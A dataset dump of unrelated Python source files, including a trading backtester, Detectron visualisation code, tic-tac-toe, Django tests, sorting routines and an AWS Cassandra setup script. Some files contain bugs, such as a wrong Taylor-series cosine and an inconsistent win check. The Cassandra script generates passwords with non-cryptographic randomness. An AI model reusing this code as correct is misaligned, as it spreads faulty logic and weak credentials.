highPrice:[ , , ,],\n }\n \"\"\"\n return HistoryData().get_history_data()\n\n # 处理数据\n def handle_data(self, data_dict=None, today=None, price_type=None):\n # data = [float(x) for x in range(20)]\n # 获取时间长度搓 取数据字典中 第一个key 作为 后边遍历的标准\n data = data_dict[list(data_dict.keys())[0]]\n\n print('处理数据为:', data.columns[-1])\n real_data = data\n data = data[data.columns[-1]]\n\n # 创建策略实例\n demo = Demo()\n\n # a = talib.MA(np.array(data), timeperiod=10)\n for i in range(len(data)):\n # print('data[i], a[i]', data[i], a[i])\n today = real_data.index[i]\n try:\n price = data[i + 1]\n except:\n price = np.nan\n\n info_d = {}\n info_d['datetime'] = today\n info_d['price'] = price\n info_d['data_dict'] = data_dict\n info_d['dataLen'] = i # 记入数据长度\n\n # 获取开平仓信号\n info_dict = demo.run(info_d)\n # if data[i] > a[i] and self.openFlag == True:\n print('\\n时间挫{} \\n'.format(today))\n\n # 判断是否有删除的挂单\n for d_index in range(len(demo.limit_order_list)):\n if demo.limit_order_list[d_index]['id'] == info_dict['delLimit']:\n del demo.limit_order_list[d_index]\n\n for _index in range(len(demo.limit_order_list)):\n if demo.limit_order_list[_index]['openPrice'] < price and demo.limit_order_list[_index]['side'] == 'buy':\n self.order_open(demo.limit_order_list[_index])\n self.csv_openPrice_dict[demo.limit_order_list[_index]['datetime']] = 
demo.limit_order_list[_index]['openPrice']\n else:\n self.csv_openPrice_dict[demo.limit_order_list[_index]['datetime']] = ''\n\n if demo.limit_order_list[_index]['closePrice'] > price and demo.limit_order_list[_index]['side'] == 'sell':\n self.csv_closePrice_dict[demo.limit_order_list[_index]['datetime']] = demo.limit_order_list[_index]['closePrice']\n self.order_close(demo.limit_order_list[_index])\n else:\n self.csv_closePrice_dict[demo.limit_order_list[_index]['datetime']] = ''\n\n # 遍历需要交易池\n # 如果是 市价单\n for market_open_order in demo.market_open_order_list:\n if self.openFlag == True:\n self.order_open(market_open_order)\n self.csv_openPrice_dict[market_open_order['datetime']] = price\n self.closeFlag = True\n self.openFlag = False\n else:\n self.csv_openPrice_dict[market_open_order['datetime']] = ''\n\n for market_close_order in demo.market_close_order_list:\n if self.closeFlag == True:\n self.order_close(market_close_order)\n self.csv_closePrice_dict[market_close_order['datetime']] = price\n self.openFlag = True\n self.closeFlag = False\n else:\n self.csv_closePrice_dict[market_close_order['datetime']] = ''\n\n for _k in data_dict.keys():\n self.csv_dataPrice_dict[_k] = data_dict[_k]\n\n\n l_balance = {}\n l_balance = copy.deepcopy(self.balance)\n print('当前余额{}'.format(l_balance))\n self.csv_balance_list.append(l_balance)\n self.csv_time_list.append(today)\n\n self.every_balance.append(l_balance)\n print('every_balance 列表', self.every_balance)\n print('csv_balance_list:', self.csv_balance_list)\n\n self.free_cash_list.append(self.free_cash)\n self.used_cash_list.append(self.used_cash)\n\n print('allowClose_symbol:', self.allowClose_symbol)\n\n # 信号 建仓\n def order_open(self, info_dict):\n print('建仓交易')\n # self.Order(symbol, amount, price)\n order_info = {}\n order_info['symbol'] = info_dict['symbol']\n order_info['amount'] = info_dict['amount']\n order_info['price'] = info_dict['openPrice']\n order_info['type'] = info_dict['type']\n order_info['datetime'] = info_dict['datetime']\n\n self.allowClose_symbol[info_dict['id']] = order_info\n self.trade_date.append(order_info['datetime'])\n self.every_handle_OpenBalance(info_dict)\n pass\n\n # 信号 平仓\n def order_close(self, info_dict):\n print('平仓交易')\n order_info = {}\n order_info['symbol'] = info_dict['symbol']\n order_info['amount'] = info_dict['amount']\n order_info['price'] = info_dict['closePrice']\n order_info['type'] = info_dict['type']\n order_info['datetime'] = info_dict['datetime']\n # self.Order(symbol, amount, price)\n self.trade_date.append(order_info['datetime'])\n self.every_handle_CloseBalance(info_dict)\n\n pass\n\n # 每日处理 建仓单\n def every_handle_OpenBalance(self, info_dict):\n price = float(info_dict['price'])\n amount = float(info_dict['amount'])\n order_amount = price * amount # 需要下单的手数\n\n balance_coin = info_dict['balanceCoin']\n\n if self.free_cash[balance_coin] <= order_amount:\n print('金额不足无法交易, 当前可用金额为{}, 需要交易金额{}'.format(self.free_cash[balance_coin], order_amount))\n pass\n else:\n self.used_cash[balance_coin] += float(amount * price)\n print('占用保证金为{}'.format(self.used_cash[balance_coin]))\n self.free_cash[balance_coin] = self.balance[balance_coin] - self.used_cash[balance_coin]\n self.balance[balance_coin] = self.balance[balance_coin] - float(amount * price)* self.open_fee\n # self.every_balance.append(self.balance)\n print('扣除开仓手续费{}'.format(float(amount * price)* self.open_fee))\n print('下单之后当前可用金额:{}'.format(self.free_cash[balance_coin]))\n\n # 每日处理 平仓单\n def every_handle_CloseBalance(self, info_dict):\n # 
self.cash = self.cash - float(amount * price)\n price = float(info_dict['price'])\n amount = float(info_dict['amount'])\n order_amount = price * amount # 需要下单的手数\n\n balance_coin = info_dict['balance_coin']\n\n for id in list(self.allowClose_symbol.keys()):\n self.used_cash[balance_coin] -= float(self.allowClose_symbol[id]['price'])\n cash = float(self.allowClose_symbol[id]['amount']) * float(self.allowClose_symbol[id]['price'])*(1 - self.close_fee)\n print('扣除平仓手续后,退还金额:{}'.format(cash))\n # 利润计算\n profit = (float(price) - float(self.allowClose_symbol[id]['price'])) * float(self.allowClose_symbol[id]['amount'])\n print('获得利润为{}'.format(profit))\n self.balance[balance_coin] += profit\n self.free_cash[balance_coin] = self.balance[balance_coin] - self.used_cash[balance_coin]\n\n del self.allowClose_symbol[id]\n\n print('退还后的总余额:{}'.format(self.balance[balance_coin]))\n # self.every_balance.append(self.balance)\n\n # 不下单子时处理 余额\n def every_handle_Balance(self, date_time):\n # self.every_balance.append(self.balance)\n pass\n\n\n\nif __name__ == '__main__':\n # Account().get_history('a', 'a', 'a', 'a')\n # l_data = [1.0, 2.0, 3.0, 4.0, 5.0]\n # a = talib.MA(np.array(l_data), timeperiod=5)\n Account(init_dict).handle_data()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Account/accountMain_Fund_signal_v3.py","file_name":"accountMain_Fund_signal_v3.py","file_ext":"py","file_size_in_byte":10983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"401836293","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport cv2\nimport numpy as np\nimport os\nimport math\n\nfrom caffe2.python import core\nfrom caffe2.python import workspace\n\nfrom detectron.core.config import cfg\nfrom detectron.core.config import get_output_dir\nfrom detectron.utils.io import save_object\n\n\ndef feat_map_draw(im_name, output_dir, feat_map, is_save=True):\n feat_map = np.max(feat_map.copy(), 0)\n\n max_value = np.max(feat_map)\n if max_value > 0:\n # max_value = max_value * 0.1\n # feat_map = np.clip(feat_map, 0, max_value)\n feat_map = feat_map / max_value * 255\n feat_map = feat_map.astype(np.uint8)\n im_color = cv2.applyColorMap(feat_map, cv2.COLORMAP_JET)\n if not is_save:\n return im_color\n file_name = os.path.join(output_dir, im_name + '.png')\n cv2.imwrite(file_name, im_color)\n\n\ndef argmax_feat_map_draw(im_name, output_dir, im, conv5, roi_feat,\n argmax_roi_feat):\n conv5 = feat_map_draw(None, None, conv5.copy(), is_save=False)\n\n max_idx = np.argmax(roi_feat, axis=0)\n\n h, w, _ = conv5.shape\n c, ph, pw = argmax_roi_feat.shape\n ih, iw, _ = im.shape\n\n stride = 1.0 * min(ih, iw) / min(h, w)\n r = 255\n g = 0\n b = 0\n\n thickness = 4\n # thickness = 1\n\n for i in range(ph):\n for j in range(pw):\n c = max_idx[i, j]\n idx = argmax_roi_feat[c, i, j]\n idx_h = int(idx / w)\n idx_w = int(idx % w)\n conv5[idx_h, idx_w, 0] = b\n conv5[idx_h, idx_w, 1] = g\n conv5[idx_h, idx_w, 2] = r\n\n idx_h = max(0, min(int(idx_h * stride), ih - 1))\n idx_w = max(0, min(int(idx_w * stride), iw - 1))\n # im[idx_h, idx_w, 0] = b\n # im[idx_h, idx_w, 1] = g\n # im[idx_h, idx_w, 2] = r\n\n x1 = int(idx_w - stride / 2 * thickness)\n y1 = int(idx_h - stride / 2 * thickness)\n x2 = int(idx_w + stride / 2 * thickness)\n y2 = int(idx_h + stride / 2 * thickness)\n\n cv2.rectangle(im, (x1, y1), (x2, y2), (b, g, r), cv2.FILLED)\n\n file_name = os.path.join(output_dir, im_name + 
'_im.png')\n cv2.imwrite(file_name, im)\n\n file_name = os.path.join(output_dir, im_name + '_conv5.png')\n cv2.imwrite(file_name, conv5)\n\n\ndef feat_draw(im_name, output_dir, im, conv5, roi_feats, rois,\n argmax_roi_feats):\n\n for i in range(roi_feats.shape[0]):\n roi_feat = roi_feats[i].copy()\n feat_map_draw(im_name + '_' + str(i), output_dir, roi_feat)\n\n argmax_roi_feat = argmax_roi_feats[i].copy()\n argmax_feat_map_draw(im_name + '_argmax_' + str(i), output_dir,\n im.copy(), conv5.copy(), roi_feat.copy(),\n argmax_roi_feat.copy())\n\n feat_map_draw(im_name + '_conv5', output_dir, conv5.copy())\n\n\ndef feat_vis(im, entry, im_name, output_dir):\n\n if cfg.TEST.BBOX_AUG.ENABLED:\n print('test aug is not support')\n exit(0)\n\n if cfg.DEDUP_BOXES > 0:\n print('cfg.DEDUP_BOXES > 0 is not support')\n exit(0)\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n rois = workspace.FetchBlob(core.ScopedName('rois')).squeeze()\n obn_scores = workspace.FetchBlob(core.ScopedName('obn_scores')).squeeze()\n\n # conv5 = workspace.FetchBlob(core.ScopedName('res5_1_sum')).squeeze()\n # conv5 = workspace.FetchBlob(core.ScopedName('res5_2_sum')).squeeze()\n # conv5 = workspace.FetchBlob(core.ScopedName('conv5_3')).squeeze()\n\n roi_feats = workspace.FetchBlob(core.ScopedName('roi_feat')).squeeze()\n fc6 = workspace.FetchBlob(core.ScopedName('fc6')).squeeze()\n fc7 = workspace.FetchBlob(core.ScopedName('fc7')).squeeze()\n\n argmax_roi_feats = workspace.FetchBlob(\n core.ScopedName('_argmax_roi_feat')).squeeze()\n\n # Softmax class probabilities\n scores = workspace.FetchBlob(core.ScopedName('cls_prob')).squeeze()\n # In case there is 1 proposal\n scores = scores.reshape([-1, scores.shape[-1]])\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n gt_inds = np.where(entry['gt_classes'] > 0)[0]\n\n max_overlaps = entry['max_overlaps']\n\n if np.random.random() < 0.10 or True:\n bg_inds = np.where(max_overlaps < 0.5)[0]\n\n # random bg\n # bg_inds = np.random.choice(bg_inds, 1)\n\n # hard bg\n scores_bg = scores[bg_inds, :]\n gt_classes = entry['gt_classes'][gt_inds]\n gt_classes = np.unique(gt_classes)\n scores_bg = scores_bg[:, gt_classes]\n # scores_bg = np.sum(scores_bg, axis=1)\n bg_inds = bg_inds[scores_bg.argmax(axis=0)]\n\n keep_inds = np.append(gt_inds, bg_inds)\n else:\n keep_inds = gt_inds\n\n rois = rois[keep_inds, ...]\n obn_scores = obn_scores[keep_inds, ...]\n roi_feats = roi_feats[keep_inds, ...]\n argmax_roi_feats = argmax_roi_feats[keep_inds, ...]\n fc6 = fc6[keep_inds, ...]\n fc7 = fc7[keep_inds, ...]\n scores = scores[keep_inds, :]\n\n # max_classes = entry['max_classes'][keep_inds]\n gt_classes = entry['gt_classes'][keep_inds]\n\n # feat_draw(im_name, output_dir, im, conv5, roi_feats, rois,\n # argmax_roi_feats)\n\n save_file = os.path.join(output_dir, im_name + '.pkl')\n print('save to ', save_file)\n save_object(\n dict(\n rois=rois,\n # conv5=conv5,\n roi_feats=roi_feats,\n fc6=fc6,\n fc7=fc7,\n gt_classes=gt_classes,\n ), save_file)\n","sub_path":"detectron/utils/feat_vis.py","file_name":"feat_vis.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"160140019","text":"game = [[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"]]\ngame_run = 0\nprint(\"player 1 goes first.\")\nlet = \"x\"\nsum = 0\nfor row in game:\n print(row[0], row[1], row[2])\n\ndsw=0\nwhile game_run < 9:\n c = int(input(\"What column would you like to go to? 
\"))\n r = int(input(\"What row would you like to go to? \"))\n if game[c][r] == \"-\":\n if sum % 2 == 0:\n let = \"x\"\n else:\n let = \"o\"\n sum = sum + 1\n game[c][r] = let\n print(game)\n game_run = game_run + 1\n for row in game:\n print(row[0], row[1], row[2])\n for l in range (0,3):\n if (game [0][l] == let and game[1][l] == \"x\" and game[2][l] == \"x\") or (game [0][l] == \"o\" and game[1][l] == \"o\" and game[2][l] == \"o\"):\n dsw = 1\n break\n if dsw == 0:\n for k in range(0, 3):\n if (game[k][0] == \"x\" and game[k][1] == \"x\" and game[k][2] == \"x\") or (game[k][0] == \"o\" and game[k][1] == \"o\" and game[k][2] == \"o\"):\n dsw = 1\n break\n if dsw == 0:\n if (game[0][0] == let and game[1][1] == let and game[2][2] == let) or (game[2][0] == let and game[1][1] == let and game[0][2] == let):\n dsw = 1\n\n if dsw == 1:\n game_run = 123456789098765432\n\n else:\n print(\"This space is already occupied.\")\n print(\"Pick a new place to move!\")\n\nif dsw == 1:\n print(\"Player \" + let + \" you win!\")\n","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"369450601","text":"from django.urls import reverse\nfrom django.utils.http import urlencode\n\nfrom workshops.tests.base import TestBase\nfrom workshops.forms import ActionRequiredPrivacyForm\nfrom workshops.models import Person\n\n\nclass TestActionRequiredPrivacy(TestBase):\n def setUp(self):\n super()._setUpAirports()\n super()._setUpBadges()\n self.neville = Person.objects.create(\n personal='Neville', family='Longbottom',\n email='neville@longbottom.com', gender='M', may_contact=True,\n publish_profile=False, airport=self.airport_0_0,\n username='longbottom_neville',\n data_privacy_agreement=False,\n is_active=True,\n )\n self.neville.save()\n\n def test_agreement_already_set(self):\n \"\"\"Make sure the view redirect somewhere if person has already agreed\n to the privacy policy.\"\"\"\n # force login Neville\n self.client.force_login(self.neville)\n\n url = reverse('action_required_privacy')\n\n # form renders\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 200)\n\n # Neville decided to agree on the privacy policy for this test\n self.neville.data_privacy_agreement = True\n self.neville.save()\n\n # form throws 404\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 404)\n\n def test_agreement_submit(self):\n \"Make sure the form passes only when `data_agreement_policy` is set.\"\n # setup sample data\n data = {\n 'data_privacy_agreement': False,\n 'may_contact': False,\n 'publish_profile': False,\n }\n\n # make sure it doesn't pass without the privacy policy consent\n form = ActionRequiredPrivacyForm(data, instance=self.neville)\n self.assertFalse(form.is_valid())\n\n # let's try with consent for privacy policy\n data.update({'data_privacy_agreement': True})\n form = ActionRequiredPrivacyForm(data, instance=self.neville)\n self.assertTrue(form.is_valid())\n\n\nclass TestActionRequiredPrivacyMiddleware(TestBase):\n def setUp(self):\n super()._setUpAirports()\n super()._setUpBadges()\n self.neville = Person.objects.create(\n personal='Neville', family='Longbottom',\n email='neville@longbottom.com', gender='M', may_contact=True,\n publish_profile=False, airport=self.airport_0_0,\n username='longbottom_neville',\n data_privacy_agreement=False,\n is_active=True,\n )\n self.neville.save()\n self.form_url = reverse('action_required_privacy')\n\n def 
test_anonymous_user(self):\n \"\"\"Ensure anonymous user can reach anything.\"\"\"\n urls = [\n reverse('login'),\n reverse('api:root'),\n reverse('training_request'),\n reverse('training_request_confirm'),\n reverse('workshop_request'),\n reverse('workshop_request_confirm'),\n ]\n # ensure we're not logged in\n self.client.logout()\n\n for url in urls:\n rv = self.client.get(url)\n # no redirects!\n self.assertEqual(rv.status_code, 200)\n # user indeed is anonymous\n self.assertEqual(rv.wsgi_request.user.is_anonymous, True)\n\n def test_logged_in_user(self):\n \"\"\"Ensure logged-in user w/o privacy policy agreement is redirected\n to the form.\"\"\"\n urls = [\n reverse('admin-dashboard'),\n reverse('trainee-dashboard'),\n ]\n\n form_url = reverse('action_required_privacy')\n\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n\n for url in urls:\n rv = self.client.get(url)\n # redirects to the form\n self.assertEqual(rv.status_code, 302)\n self.assertTrue(rv['Location'].startswith(form_url))\n\n def test_no_more_redirects_after_agreement(self):\n \"\"\"Ensure user is no longer forcefully redirected to accept the\n privacy policy.\"\"\"\n url = reverse('trainee-dashboard')\n form_url = reverse('action_required_privacy')\n\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n\n # we can't get to the url because we're redirected to the form\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 302)\n self.assertTrue(rv['Location'].startswith(form_url))\n\n # agree on the privacy policy\n self.neville.data_privacy_agreement = True\n self.neville.save()\n\n # now the dashboard is easily reachable\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 200)\n\n def test_allowed_urls(self):\n form_url = reverse('action_required_privacy')\n urls = [\n reverse('logout'),\n ]\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n for url in urls:\n rv = self.client.get(url)\n # doesn't redirect to the form\n self.assertIn(rv.status_code, [200, 302])\n if 'Location' in rv:\n self.assertNotEqual(rv['Location'], form_url)\n\n def test_next_param(self):\n \"\"\"Ensure a non-dispatch URL is reachable through `?next` query\n string.\"\"\"\n\n url = reverse('autoupdate_profile')\n form_url = reverse('action_required_privacy')\n form_url += '?{}'.format(urlencode({'next': url}))\n\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n\n # submit form\n rv = self.client.post(form_url, data=dict(data_privacy_agreement=True))\n self.assertEqual(rv.status_code, 302)\n self.assertEqual(rv['Location'], url)\n","sub_path":"amy/workshops/tests/test_action_required.py","file_name":"test_action_required.py","file_ext":"py","file_size_in_byte":6014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"476924030","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.path.append('/usr/local/anaconda3/lib/python3.6/site-packages')\nfrom math import sin, cos\ndef mans_kosinuss(x):\n k = 0\n a = (-1)**0*x**1/(1)\n S = a\n print(\"Izdruka no liet.f. a0 = %6.2f S0 = %6.2f\"%(a,S))\n while k < 3:\n k = k + 1\n R = (-1)**x/((2*k)*(2*k+1))\n a = a * R\n S = S + a\n print(\"Izdruka no liet.f. a%d = %6.2f S%d = %6.2f\"%(k,a,k,S))\n \n print(\"Izdruka no liet.f. 
Beigas!\")\n    return S\n\nx = float(input(\"Lietotāj, lūdzu, ievadi argumentu (x): \"))\ny = cos(x)*cos(x)\nprint(\"standarta kos(%.2f) = %6.2f\"%(x,y))\nyy = mans_kosinuss(x)\nprint(\"mans kos(%.2f) = %6.2f\"%(x,yy))\n\n\n","sub_path":"teilora.py","file_name":"teilora.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"166338116","text":"from pickle import dump, load\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef add_anomalies(df1, df2):\n    \"\"\"\n    checks current data against pre-existing anomaly labels\n\n    df1 : single sensor pandas dataframe\n    df2 : single sensor pandas dataframe w/ labels\n    \"\"\"\n\n    # make sure our date column is in datetime\n    # Datetime can be changed to whatever naming\n    # structure we decide on\n    df1[\"Datetime\"] = pd.to_datetime(df1[\"Datetime\"])\n    df2[\"Datetime\"] = pd.to_datetime(df2[\"Datetime\"])\n\n    # labels all main bucket normal\n    df1[\"AM\"] = False\n\n    # join dataframes adding anomaly columns\n    # adds false values to new data\n    df2 = df2.combine_first(df1)\n\n    # update all machine values where there are human inputs\n    cond = ~df2[\"AH\"].isna()\n    df2[\"AM\"].loc[cond] = df2[\"AH\"].loc[cond]\n\n    return df2\n\n\ndef split_sensors(df1):\n    \"\"\"\n    separates dataframe into multiple dataframes\n    returns list of dataframes\n\n    df1 : single sensor pandas dataframe\n    \"\"\"\n\n    # separates single dataframe into multiples with each sensor\n    # appends to list\n    split_df = pd.DataFrame(df1.groupby(\"uniqueID\"))[1]\n    sensor_bucket = {}\n\n    # couldn't find a way to vectorize this process\n    # dropped and renamed columns to be returned to once InfluxDB is running\n    for i in range(0, len(split_df)):\n        sensor_bucket[split_df[i][\"uniqueID\"].any()] = (\n            split_df[i]\n            .reset_index()\n            .drop([\"index\", \"result\", \"table\"], axis=1)\n            .rename(columns={\"_time\": \"DateTime\", \"_value\": \"Value\", \"uniqueID\": \"ID\"})\n        )\n\n    return sensor_bucket\n\n\ndef load_loss_percentile(sensor_name, file_path=\"./test_env_loss_percentiles/\"):\n    \"\"\"\n    loads the percentile for prediction\n    to be multiplied with the threshold multiplier\n\n    sensor_name : string\n    file_path : string\n    \"\"\"\n\n    file_name = sensor_name + \"_loss_percentile.pkl\"\n\n    loss_percentile = load(open(file_path + file_name, \"rb\"))\n\n    return loss_percentile\n\n\ndef std_val_train(col1, id, file_path=\"../standardize-parameters/\"):\n    \"\"\"\n    fits a standard scaler to the column, saves the scaler parameters\n    to disk and returns the standardized values\n\n    col1 : single sensor pandas int column\n    id : string, name of sensor (or sensor group)\n    file_path : string\n    \"\"\"\n    file_name = id + \"_scaler.pkl\"\n    # create scaler object\n    scale = StandardScaler()\n    # apply to pandas column\n    st_col1 = scale.fit_transform(col1)\n\n    # save scaler parameters\n    dump(scale, open(file_path + file_name, \"wb\"))\n\n    return st_col1\n\n\ndef std_val_predict(col1, id, file_path=\"../standardize-parameters/\"):\n    \"\"\"\n    standardizes the column using the scaler parameters saved during training\n\n    col1 : single sensor pandas int column\n    id : string, name of sensor (or sensor group)\n    file_path : string\n    \"\"\"\n    file_name = id + \"_scaler.pkl\"\n    # create scaler object\n    scale = load(open(file_path + file_name, \"rb\"))\n    # apply to pandas column\n    st_col1 = scale.transform(col1)\n\n    return st_col1\n\n\ndef group_check(df1):\n    \"\"\"\n    checks current data if sensor has been assigned a group\n\n    df1 : single sensor pandas dataframe\n    
\"\"\"\n # load in group lookup csv. Path to be changed\n group_csv = pd.read_csv(\"../../data/testing-data/group_lookup.csv\")\n\n # loop through groups looking for match\n # group length is only 3 for now\n # need not vectorize\n for i in range(0, len(group_csv)):\n if df1[\"ID\"].any() in list(group_csv.iloc[:, i]):\n group = list(group_csv.columns)[i]\n return group\n\n return df1[\"ID\"].any()\n\n\ndef split_normal(df1):\n \"\"\"\n splits normal and abnormal data\n\n df1 : single sensor pandas dataframe\n \"\"\"\n split_df = pd.DataFrame(df1.groupby(\"AM\"))[1]\n\n # returns two dataframes. One of normal data\n # one with abnormal data\n return (\n split_df[0].reset_index().drop(\"index\", axis=1),\n split_df[1].reset_index().drop(\"index\", axis=1),\n )\n\n\ndef model_parser(df1, x_train, y_train, x_eval):\n \"\"\"\n changes columns to\n\n df1 : single sensor pandas dataframe\n x_train : sequenced x data for training\n y_train : sequenced y data for training\n x_train : sequenced x data for evaluating\n \"\"\"\n dict_data = {\n df1[\"ID\"].any(): {\n \"x_train\": x_train,\n \"y_train\": y_train,\n \"x_eval\": x_eval,\n \"y_eval\": \"_\",\n \"train\": df1,\n \"test\": \"_\",\n }\n }\n\n return dict_data\n","sub_path":"code/model/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343911661","text":"# A pangram is a sentence that contains every single letter of the alphabet at least once. For example, the sentence \"The quick brown fox jumps over the lazy dog\" is a pangram, because it uses the letters A-Z at least once (case is irrelevant).\n# Given a string, detect whether or not it is a pangram. Return True if it is, False if not. 
Ignore numbers and punctuation.\n\ndef is_pangram(string):\n    alphabet = 'abcdefghijklmnopqrstuvwxyz'\n    lstring = string.lower()\n    for letter in alphabet:\n        if letter not in lstring:\n            return False\n    return True\n\n# run some tests\nis_pangram(\"The quick, brown fox jumps over the lazy dog!\")\nis_pangram(\"This is some other string.\")","sub_path":"PY/is_pangram.py","file_name":"is_pangram.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"141034997","text":"# Some of sorting algorithms\r\n\r\nmas=[1,6,3,8,5,2,19,43,25,65,76,0,10]\r\n\r\n#___________________________________Stable Sorting Algorithms#___________________________________#\r\n\r\n#Bubble sort O(n^2)\r\ndef bubble_sort(ls):\r\n    for i in range(len(ls)):\r\n        for j in range(0, i, 1):\r\n            if ls[i]<ls[j]:\r\n                temp=ls[i]\r\n                ls[i]=ls[j]\r\n                ls[j]=temp\r\n    return ls\r\n\r\n#Insertion sort O(n^2)\r\ndef insertion_sort(ls):\r\n    for i in range(1, len(ls)):\r\n        a=ls[i]\r\n        j=i-1\r\n        while j>=0 and ls[j]>a:\r\n            ls[j+1]=ls[j]\r\n            j-=1\r\n        ls[j+1]=a\r\n    return ls \r\n\r\n#Cocktail(Shaker) sort O(n^2)\r\ndef cocktail_sort(ls):\r\n    left=0\r\n    right=len(ls)-1\r\n    while left<=right:\r\n        for i in range(left, right, +1):\r\n            if ls[i]>ls[i+1]:\r\n                temp2=ls[i+1]\r\n                ls[i+1]=ls[i]\r\n                ls[i]=temp2\r\n        right-=1\r\n\r\n        for i in range (right, left, -1):\r\n            if ls[i-1]>ls[i]:\r\n                temp=ls[i-1]\r\n                ls[i-1]=ls[i]\r\n                ls[i]=temp\r\n        left+=1\r\n\r\n    return ls\r\n#__________________________________No Stable Sorting Algorithms___________________________________#\r\n\r\n#Selection sort O(n^2)\r\ndef selection_sort(ls):\r\n    for i in range(len(ls)-1):\r\n        temp=i\r\n        for j in range(i+1, len(ls), 1):\r\n            if ls[j]<ls[temp]:\r\n                temp=j\r\n        if temp!=i:\r\n            temp2=ls[i]\r\n            ls[i]=ls[temp]\r\n            ls[temp]=temp2\r\n    return ls\r\n\r\n#Quick sort O(n*log(n))\r\ndef quick_sort(ls, begin, end):\r\n    if begin<end:\r\n        pivat=ls[(begin+end)//2]\r\n        first=begin\r\n        last=end\r\n        while first<=last:\r\n            while(ls[first]<pivat): first+=1\r\n            while(ls[last]>pivat): last-=1\r\n            if(first<=last):\r\n                temp=ls[first]\r\n                ls[first]=ls[last]\r\n                ls[last]=temp\r\n                last-=1\r\n                first+=1\r\n        if(last>begin):\r\n            quick_sort(ls, begin, last)\r\n        if(first<end):\r\n            quick_sort(ls, first, end)\r\n\ndef setup_security_groups(cluster_name: str, public_ips: dict, result: dict) -> dict:\n    '''\n    Allow traffic between regions\n\n    Returns a dict of region -> security group ID\n    '''\n    for region, ips in public_ips.items():\n        with Action('Configuring security group in {}..'.format(region)):\n            ec2 = boto3.client('ec2', region)\n            resp = ec2.describe_vpcs()\n            # TODO: support more than one VPC..\n            vpc_id = resp['Vpcs'][0]['VpcId']\n            sg_name = cluster_name\n            sg = ec2.create_security_group(GroupName=sg_name,\n                                           VpcId=vpc_id,\n                                           Description='Allow cassandra nodes to talk via port 7001')\n            result[region] = sg\n\n            ec2.create_tags(Resources=[sg['GroupId']],\n                            Tags=[{'Key': 'Name', 'Value': sg_name}])\n            ip_permissions = []\n            # NOTE: we need to allow ALL public IPs (from all regions)\n            for ip in itertools.chain(*public_ips.values()):\n                ip_permissions.append({'IpProtocol': 'tcp',\n                                       'FromPort': 7001, # port range: From-To\n                                       'ToPort': 7001,\n                                       'IpRanges': [{'CidrIp': '{}/32'.format(ip['PublicIp'])}]})\n            ip_permissions.append({'IpProtocol': '-1',\n                                   'UserIdGroupPairs': [{'GroupId': sg['GroupId']}]})\n\n            # if we can find the Odd security group, authorize SSH access from it\n            try:\n                resp = ec2.describe_security_groups(GroupNames=['Odd (SSH Bastion Host)'])\n                odd_sg = resp['SecurityGroups'][0]\n\n                ip_permissions.append({'IpProtocol': 'tcp',\n                                       'FromPort': 22, # port range: From-To\n                                       'ToPort': 22,\n                                       'UserIdGroupPairs': [{'GroupId': odd_sg['GroupId']}]})\n            except ClientError:\n                pass\n\n            ec2.authorize_security_group_ingress(GroupId=sg['GroupId'],\n                                                 IpPermissions=ip_permissions)\n\n\ndef find_taupage_amis(regions: list) -> dict:\n    '''\n    Find latest Taupage AMI for each region\n    '''\n    result = {}\n    for region in regions:\n        with Action('Finding latest Taupage AMI in {}..'.format(region)):\n            ec2 = boto3.resource('ec2', region)\n            filters = [{'Name': 'name', 'Values': 
['*Taupage-AMI-*']},\n {'Name': 'is-public', 'Values': ['false']},\n {'Name': 'state', 'Values': ['available']},\n {'Name': 'root-device-type', 'Values': ['ebs']}]\n images = list(ec2.images.filter(Filters=filters))\n if not images:\n raise Exception('No Taupage AMI found')\n most_recent_image = sorted(images, key=lambda i: i.name)[-1]\n result[region] = most_recent_image\n return result\n\n\ndef get_latest_docker_image_version():\n url = 'https://registry.opensource.zalan.do/teams/stups/artifacts/planb-cassandra/tags'\n return requests.get(url).json()[-1]['name']\n\n\npassword_chars = \"{}{}{}\".format(string.ascii_letters, string.digits,\n re.sub(\"[\\\\\\\\'\\\"]\", \"\", string.punctuation))\n\n\ndef generate_password(length: int = 32) -> str:\n return \"\".join(random.choice(password_chars) for x in range(length))\n\n\ndef generate_certificate(cluster_name: str):\n check = call([\"which\", \"keytool\"])\n if check:\n print(\"Keytool is not in searchpath\")\n return\n\n d = tempfile.mkdtemp()\n try:\n keystore = os.path.join(d, 'keystore')\n cmd = [\"keytool\", \"-genkeypair\",\n \"-alias\", \"planb\",\n \"-keyalg\", \"RSA\",\n \"-validity\", \"36000\",\n 